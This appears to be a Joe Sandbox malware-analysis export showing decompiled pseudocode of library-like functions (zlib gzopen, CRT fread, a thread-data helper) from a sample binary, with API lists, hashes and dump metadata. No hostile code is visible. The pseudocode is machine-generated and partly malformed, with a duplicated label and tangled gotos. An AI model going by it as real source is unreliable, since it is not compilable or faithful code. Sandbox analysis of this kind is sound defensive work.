                                                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                                                    				char _t64;
                                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                                                                    				intOrPtr _t69;
                                                                                                                                                                                                    				intOrPtr _t70;
                                                                                                                                                                                                    				intOrPtr _t74;
                                                                                                                                                                                                    				intOrPtr _t79;
                                                                                                                                                                                                    				intOrPtr _t82;
                                                                                                                                                                                                    				intOrPtr* _t83;
                                                                                                                                                                                                    				void* _t86;
                                                                                                                                                                                                    				char* _t88;
                                                                                                                                                                                                    				char* _t89;
                                                                                                                                                                                                    				intOrPtr* _t91;
                                                                                                                                                                                                    				intOrPtr* _t93;
                                                                                                                                                                                                    				signed int _t97;
                                                                                                                                                                                                    				signed int _t98;
                                                                                                                                                                                                    				void* _t100;
                                                                                                                                                                                                    				void* _t101;
                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t98 = _t97 | 0xffffffff;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                                                                                                                                                    				_t91 = __eax;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                                                                                                                                                    				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                                                                                                                                                                                                    					_t101 = _t100 + 4;
                                                                                                                                                                                                    					if(_t93 == 0) {
                                                                                                                                                                                                    						L31:
                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                                                                                                                                                                    						 *_t93 = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                                                                                                                                                    						 *(_t93 + 0x6c) = _t98;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                                                                                                                                                                                                    						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                                                                                                                                                    						_t102 = _t101 + 0xc;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                                                                                                                                                    						_t87 = _t57 + 1;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t82 =  *_t57;
                                                                                                                                                                                                    							_t57 = _t57 + 1;
                                                                                                                                                                                                    						} while (_t82 != 0);
                                                                                                                                                                                                    						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                                                                                                                                                                                                    						_t103 = _t102 + 4;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                                                                                                                                                    						if(_t60 == 0) {
                                                                                                                                                                                                    							L30:
                                                                                                                                                                                                    							E00405160(0, _t87, _t93);
                                                                                                                                                                                                    							goto L31;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                                                                                                                                                    							_t88 = _t60;
                                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							if( *_t91 == 0x72) {
                                                                                                                                                                                                    								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t63 =  *_t91;
                                                                                                                                                                                                    							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                                                                                                                                                    								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t64 =  *_t91;
                                                                                                                                                                                                    							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                                                                                                                                                    								__eflags = _t64 - 0x66;
								if(_t64 != 0x66) {
									__eflags = _t64 - 0x68;
									if(_t64 != 0x68) {
										__eflags = _t64 - 0x52;
										if(_t64 != 0x52) {
											_t89 =  *((intOrPtr*)(_t103 + 0x14));
											 *_t89 = _t64;
											_t87 = _t89 + 1;
											__eflags = _t87;
											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
										} else {
											 *((intOrPtr*)(_t103 + 0x10)) = 3;
										}
									} else {
										 *((intOrPtr*)(_t103 + 0x10)) = 2;
									}
								} else {
									 *((intOrPtr*)(_t103 + 0x10)) = 1;
								}
							} else {
								_t98 = _t64 - 0x30;
							}
							_t91 = _t91 + 1;
							if(_t64 == 0) {
								goto L26;
							}
							_t87 = _t103 + 0x68;
							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
								goto L9;
							}
							L26:
							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
							if(_t65 == 0) {
								goto L30;
							} else {
								if(_t65 != 0x77) {
									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
									 *_t93 = _t66;
									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
									_t104 = _t103 + 0x14;
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										__eflags =  *((intOrPtr*)(_t93 + 0x44));
										if(__eflags == 0) {
											goto L30;
										} else {
											goto L34;
										}
									}
								} else {
									_push(0x38);
									_push("1.2.3");
									_push( *((intOrPtr*)(_t103 + 0x10)));
									_push(8);
									_push(0xfffffff1);
									_push(8);
									_push(_t98);
									_push(_t93);
									_t91 = E00404CE0();
									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
									_t104 = _t103 + 0x24;
									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
									if(_t91 != 0 || _t79 == 0) {
										goto L30;
									} else {
										L34:
										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
										_t69 =  *((intOrPtr*)(_t104 + 0x70));
										__eflags = _t69;
										_push(_t104 + 0x18);
										if(__eflags >= 0) {
											_push(_t69);
											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
										} else {
											_t87 =  *((intOrPtr*)(_t104 + 0x70));
											_push( *((intOrPtr*)(_t104 + 0x70)));
											_t70 = E0040CB9D();
										}
										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
										__eflags = _t70;
										if(_t70 == 0) {
											goto L30;
										} else {
											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
											if( *((char*)(_t93 + 0x5c)) != 0x77) {
												E00405000(_t93, 0);
												_push( *((intOrPtr*)(_t93 + 0x40)));
												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
												__eflags = _t74;
												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
												return _t93;
											} else {
												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
												return _t93;
											}
										}
									}
								}
							}
							goto L42;
							L7:
							_t62 =  *_t83;
							 *_t88 = _t62;
							_t83 = _t83 + 1;
							_t88 = _t88 + 1;
							if(_t62 != 0) {
								goto L7;
							} else {
								 *((char*)(_t93 + 0x5c)) = 0;
							}
							goto L9;
						}
					}
				}
				L42:
			}
                                                                                                                                                                                                    0x0040591c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405855
                                                                                                                                                                                                    0x00405855
                                                                                                                                                                                                    0x00405859
                                                                                                                                                                                                    0x0040585b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405870
                                                                                                                                                                                                    0x00405872
                                                                                                                                                                                                    0x00405874
                                                                                                                                                                                                    0x00405874
                                                                                                                                                                                                    0x00405877
                                                                                                                                                                                                    0x0040587b
                                                                                                                                                                                                    0x00405881
                                                                                                                                                                                                    0x00405881
                                                                                                                                                                                                    0x00405885
                                                                                                                                                                                                    0x00405889
                                                                                                                                                                                                    0x00405897
                                                                                                                                                                                                    0x00405899
                                                                                                                                                                                                    0x004058a5
                                                                                                                                                                                                    0x004058a7
                                                                                                                                                                                                    0x004058b3
                                                                                                                                                                                                    0x004058b5
                                                                                                                                                                                                    0x004058c1
                                                                                                                                                                                                    0x004058c5
                                                                                                                                                                                                    0x004058c7
                                                                                                                                                                                                    0x004058c7
                                                                                                                                                                                                    0x004058c8
                                                                                                                                                                                                    0x004058b7
                                                                                                                                                                                                    0x004058b7
                                                                                                                                                                                                    0x004058b7
                                                                                                                                                                                                    0x004058a9
                                                                                                                                                                                                    0x004058a9
                                                                                                                                                                                                    0x004058a9
                                                                                                                                                                                                    0x0040589b
                                                                                                                                                                                                    0x0040589b
                                                                                                                                                                                                    0x0040589b
                                                                                                                                                                                                    0x0040588f
                                                                                                                                                                                                    0x00405892
                                                                                                                                                                                                    0x00405892
                                                                                                                                                                                                    0x004058cc
                                                                                                                                                                                                    0x004058cf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004058d1
                                                                                                                                                                                                    0x004058d9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004058db
                                                                                                                                                                                                    0x004058db
                                                                                                                                                                                                    0x004058e0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004058e2
                                                                                                                                                                                                    0x004058e4
                                                                                                                                                                                                    0x00405930
                                                                                                                                                                                                    0x0040593f
                                                                                                                                                                                                    0x00405942
                                                                                                                                                                                                    0x00405944
                                                                                                                                                                                                    0x00405949
                                                                                                                                                                                                    0x0040594c
                                                                                                                                                                                                    0x0040594e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405950
                                                                                                                                                                                                    0x00405950
                                                                                                                                                                                                    0x00405953
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405953
                                                                                                                                                                                                    0x004058e6
                                                                                                                                                                                                    0x004058ea
                                                                                                                                                                                                    0x004058ec
                                                                                                                                                                                                    0x004058f1
                                                                                                                                                                                                    0x004058f2
                                                                                                                                                                                                    0x004058f4
                                                                                                                                                                                                    0x004058f6
                                                                                                                                                                                                    0x004058f8
                                                                                                                                                                                                    0x004058f9
                                                                                                                                                                                                    0x00405904
                                                                                                                                                                                                    0x00405906
                                                                                                                                                                                                    0x0040590b
                                                                                                                                                                                                    0x0040590e
                                                                                                                                                                                                    0x00405911
                                                                                                                                                                                                    0x00405916
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405955
                                                                                                                                                                                                    0x00405955
                                                                                                                                                                                                    0x00405955
                                                                                                                                                                                                    0x00405961
                                                                                                                                                                                                    0x00405963
                                                                                                                                                                                                    0x00405967
                                                                                                                                                                                                    0x0040596d
                                                                                                                                                                                                    0x0040596e
                                                                                                                                                                                                    0x0040597c
                                                                                                                                                                                                    0x0040597d
                                                                                                                                                                                                    0x00405970
                                                                                                                                                                                                    0x00405970
                                                                                                                                                                                                    0x00405974
                                                                                                                                                                                                    0x00405975
                                                                                                                                                                                                    0x00405975
                                                                                                                                                                                                    0x00405985
                                                                                                                                                                                                    0x00405988
                                                                                                                                                                                                    0x0040598a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040598c
                                                                                                                                                                                                    0x0040598c
                                                                                                                                                                                                    0x00405990
                                                                                                                                                                                                    0x004059a5
                                                                                                                                                                                                    0x004059ad
                                                                                                                                                                                                    0x004059b6
                                                                                                                                                                                                    0x004059b6
                                                                                                                                                                                                    0x004059b9
                                                                                                                                                                                                    0x004059c5
                                                                                                                                                                                                    0x00405992
                                                                                                                                                                                                    0x00405992
                                                                                                                                                                                                    0x004059a2
                                                                                                                                                                                                    0x004059a2
                                                                                                                                                                                                    0x00405990
                                                                                                                                                                                                    0x0040598a
                                                                                                                                                                                                    0x00405916
                                                                                                                                                                                                    0x004058e4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405860
                                                                                                                                                                                                    0x00405860
                                                                                                                                                                                                    0x00405862
                                                                                                                                                                                                    0x00405864
                                                                                                                                                                                                    0x00405865
                                                                                                                                                                                                    0x00405868
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040586a
                                                                                                                                                                                                    0x0040586a
                                                                                                                                                                                                    0x0040586d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405868
                                                                                                                                                                                                    0x0040584f
                                                                                                                                                                                                    0x004057ea
                                                                                                                                                                                                    0x00000000

APIs
• _malloc.LIBCMT ref: 004057DE
  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
• _malloc.LIBCMT ref: 00405842
• _malloc.LIBCMT ref: 00405906
• _malloc.LIBCMT ref: 00405930
Strings
Memory Dump Source
• Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                    • String ID: 1.2.3
                                                                                                                                                                                                    • API String ID: 680241177-2310465506
                                                                                                                                                                                                    • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                                                    • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 85%
E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
	signed int _v8;
	char* _v12;
	signed int _v16;
	signed int _v20;
	void* __ebx;
	void* __edi;
	void* __esi;
	void* __ebp;
	signed int _t90;
	intOrPtr* _t92;
	signed int _t94;
	char _t97;
	signed int _t105;
	void* _t106;
	signed int _t107;
	signed int _t110;
	signed int _t113;
	intOrPtr* _t114;
	signed int _t118;
	signed int _t119;
	signed int _t120;
	char* _t121;
	signed int _t125;
	signed int _t131;
	signed int _t133;
	void* _t134;

	_t125 = __edx;
	_t121 = _a4;
	_t119 = _a8;
	_t131 = 0;
	_v12 = _t121;
	_v8 = _t119;
	if(_a12 == 0 || _a16 == 0) {
		L5:
		return 0;
	} else {
		_t138 = _t121;
		if(_t121 != 0) {
			_t133 = _a20;
			__eflags = _t133;
			if(_t133 == 0) {
				L9:
				__eflags = _t119 - 0xffffffff;
				if(_t119 != 0xffffffff) {
					_t90 = E0040BA30(_t131, _t121, _t131, _t119);
					_t134 = _t134 + 0xc;
				}
				__eflags = _t133 - _t131;
				if(__eflags == 0) {
					goto L3;
				} else {
					_t94 = _t90 | 0xffffffff;
					_t125 = _t94 % _a12;
					__eflags = _a16 - _t94 / _a12;
					if(__eflags > 0) {
						goto L3;
					}
					L13:
					_t131 = _a12 * _a16;
					__eflags =  *(_t133 + 0xc) & 0x0000010c;
					_v20 = _t131;
					_t120 = _t131;
					if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
						_v16 = 0x1000;
					} else {
						_v16 =  *((intOrPtr*)(_t133 + 0x18));
					}
					__eflags = _t131;
					if(_t131 == 0) {
						L40:
						return _a16;
					} else {
						do {
							__eflags =  *(_t133 + 0xc) & 0x0000010c;
							if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
								L24:
								__eflags = _t120 - _v16;
								if(_t120 < _v16) {
									_t97 = E0040FC07(_t120, _t125, _t133);
									__eflags = _t97 - 0xffffffff;
									if(_t97 == 0xffffffff) {
										L48:
										return (_t131 - _t120) / _a12;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										L44:
										__eflags = _a8 - 0xffffffff;
										if(__eflags != 0) {
											E0040BA30(_t131, _a4, 0, _a8);
											_t134 = _t134 + 0xc;
										}
										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L4:
										E0040E744(_t125, _t131, _t133);
										goto L5;
									}
									_t123 = _v12;
									_v12 = _v12 + 1;
									 *_v12 = _t97;
									_t120 = _t120 - 1;
									_t70 =  &_v8;
									 *_t70 = _v8 - 1;
									__eflags =  *_t70;
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
									goto L39;
								}
								__eflags = _v16;
								if(_v16 == 0) {
									_t105 = 0x7fffffff;
									__eflags = _t120 - 0x7fffffff;
									if(_t120 <= 0x7fffffff) {
										_t105 = _t120;
									}
								} else {
									__eflags = _t120 - 0x7fffffff;
									if(_t120 <= 0x7fffffff) {
										_t55 = _t120 % _v16;
										__eflags = _t55;
										_t125 = _t55;
										_t110 = _t120;
									} else {
                                                                                                                                                                                                    													_t125 = 0x7fffffff % _v16;
                                                                                                                                                                                                    													_t110 = 0x7fffffff;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t105 = _t110 - _t125;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t105 - _v8;
                                                                                                                                                                                                    											if(_t105 > _v8) {
                                                                                                                                                                                                    												goto L44;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_push(_t105);
                                                                                                                                                                                                    												_push(_v12);
                                                                                                                                                                                                    												_t106 = E0040FA20(_t125, _t131, _t133);
                                                                                                                                                                                                    												_pop(_t123);
                                                                                                                                                                                                    												_push(_t106);
                                                                                                                                                                                                    												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                                                                                                                                                                    												_t134 = _t134 + 0xc;
                                                                                                                                                                                                    												__eflags = _t107;
                                                                                                                                                                                                    												if(_t107 == 0) {
                                                                                                                                                                                                    													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                                                                                                                                                    													goto L48;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												__eflags = _t107 - 0xffffffff;
                                                                                                                                                                                                    												if(_t107 == 0xffffffff) {
                                                                                                                                                                                                    													L47:
                                                                                                                                                                                                    													_t80 = _t133 + 0xc;
                                                                                                                                                                                                    													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                                                                                                                                                    													__eflags =  *_t80;
                                                                                                                                                                                                    													goto L48;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_v12 = _v12 + _t107;
                                                                                                                                                                                                    												_t120 = _t120 - _t107;
                                                                                                                                                                                                    												_v8 = _v8 - _t107;
                                                                                                                                                                                                    												goto L39;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t113 =  *(_t133 + 4);
                                                                                                                                                                                                    										__eflags = _t113;
                                                                                                                                                                                                    										if(__eflags == 0) {
                                                                                                                                                                                                    											goto L24;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										if(__eflags < 0) {
                                                                                                                                                                                                    											goto L47;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t131 = _t120;
                                                                                                                                                                                                    										__eflags = _t120 - _t113;
                                                                                                                                                                                                    										if(_t120 >= _t113) {
                                                                                                                                                                                                    											_t131 = _t113;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags = _t131 - _v8;
                                                                                                                                                                                                    										if(_t131 > _v8) {
                                                                                                                                                                                                    											_t133 = 0;
                                                                                                                                                                                                    											__eflags = _a8 - 0xffffffff;
                                                                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                                                                    												E0040BA30(_t131, _a4, 0, _a8);
                                                                                                                                                                                                    												_t134 = _t134 + 0xc;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t114 = E0040BFC1(__eflags);
                                                                                                                                                                                                    											_push(_t133);
                                                                                                                                                                                                    											_push(_t133);
                                                                                                                                                                                                    											_push(_t133);
                                                                                                                                                                                                    											_push(_t133);
                                                                                                                                                                                                    											 *_t114 = 0x22;
                                                                                                                                                                                                    											_push(_t133);
                                                                                                                                                                                                    											goto L4;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                                                                                                                                                    											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                                                                                                                                                    											 *_t133 =  *_t133 + _t131;
                                                                                                                                                                                                    											_v12 = _v12 + _t131;
                                                                                                                                                                                                    											_t120 = _t120 - _t131;
                                                                                                                                                                                                    											_t134 = _t134 + 0x10;
                                                                                                                                                                                                    											_v8 = _v8 - _t131;
                                                                                                                                                                                                    											_t131 = _v20;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										L39:
                                                                                                                                                                                                    										__eflags = _t120;
                                                                                                                                                                                                    									} while (_t120 != 0);
                                                                                                                                                                                                    									goto L40;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t118 = _t90 | 0xffffffff;
                                                                                                                                                                                                    						_t90 = _t118 / _a12;
                                                                                                                                                                                                    						_t125 = _t118 % _a12;
                                                                                                                                                                                                    						__eflags = _a16 - _t90;
                                                                                                                                                                                                    						if(_a16 <= _t90) {
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                    					_t92 = E0040BFC1(_t138);
                                                                                                                                                                                                    					_push(_t131);
                                                                                                                                                                                                    					_push(_t131);
                                                                                                                                                                                                    					_push(_t131);
                                                                                                                                                                                                    					_push(_t131);
                                                                                                                                                                                                    					 *_t92 = 0x16;
                                                                                                                                                                                                    					_push(_t131);
                                                                                                                                                                                                    					goto L4;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    0x0040bcc2
                                                                                                                                                                                                    0x0040bcca
                                                                                                                                                                                                    0x0040bcce
                                                                                                                                                                                                    0x0040bcd3
                                                                                                                                                                                                    0x0040bcd5
                                                                                                                                                                                                    0x0040bcd8
                                                                                                                                                                                                    0x0040bcde
                                                                                                                                                                                                    0x0040bd01
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bce5
                                                                                                                                                                                                    0x0040bce5
                                                                                                                                                                                                    0x0040bce7
                                                                                                                                                                                                    0x0040bd08
                                                                                                                                                                                                    0x0040bd0b
                                                                                                                                                                                                    0x0040bd0d
                                                                                                                                                                                                    0x0040bd1c
                                                                                                                                                                                                    0x0040bd1c
                                                                                                                                                                                                    0x0040bd1f
                                                                                                                                                                                                    0x0040bd24
                                                                                                                                                                                                    0x0040bd29
                                                                                                                                                                                                    0x0040bd29
                                                                                                                                                                                                    0x0040bd2c
                                                                                                                                                                                                    0x0040bd2e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bd30
                                                                                                                                                                                                    0x0040bd30
                                                                                                                                                                                                    0x0040bd35

APIs
Memory Dump Source
• Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
Yara matches
Similarity
• API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
• String ID:
• API String ID: 3886058894-0
• Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
• Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
• Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
• Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 90%
E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
	signed int _t13;
	intOrPtr _t28;
	void* _t29;
	void* _t30;

	_t30 = __eflags;
	_t26 = __edi;
	_t25 = __edx;
	_t22 = __ebx;
	_push(0xc);
	_push(0x4214d0);
	E0040E1D8(__ebx, __edi, __esi);
	_t28 = E00410735(__ebx, __edx, __edi, _t30);
	_t13 =  *0x422e34; // 0xfffffffe
	if(( *(_t28 + 0x70) & _t13) == 0) {
		L6:
		E0040D6E0(_t22, 0xc);
		 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
		_t8 = _t28 + 0x6c; // 0x6c
		_t26 =  *0x422f18; // 0x422e40
		 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
		 *(_t29 - 4) = 0xfffffffe;
		E004147A2();
	} else {
		_t32 =  *((intOrPtr*)(_t28 + 0x6c));
		if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
			goto L6;
		} else {
			_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
		}
	}
	if(_t28 == 0) {
		E0040E79A(_t25, _t26, 0x20);
	}
	return E0040E21D(_t28);
}

0x00414738
0x00414738
0x00414738
0x00414738
0x00414738
0x0041473a
0x0041473f
0x00414749
0x0041474b
0x00414753
0x00414777
0x00414779
0x0041477f
0x00414783
0x00414786
0x00414791
0x00414794
0x0041479b
0x00414755
0x00414755
0x00414759
0x00000000
0x0041475b
0x00414760
0x00414760
0x00414759
0x00414765
0x00414769
0x0041476e
0x00414776

APIs
• __getptd.LIBCMT ref: 00414744
  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
• __getptd.LIBCMT ref: 0041475B
• __amsg_exit.LIBCMT ref: 00414769
• __lock.LIBCMT ref: 00414779
Strings
Memory Dump Source
• Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
Yara matches
Similarity
• API ID: __amsg_exit__getptd$__getptd_noexit__lock
• String ID: @.B
• API String ID: 3521780317-470711618
• Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
• Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
• Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
• Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%
                                                                                                                                                                                                    			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                    				intOrPtr _t19;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    				signed int _t22;
                                                                                                                                                                                                    				intOrPtr* _t27;
                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                    				intOrPtr _t40;
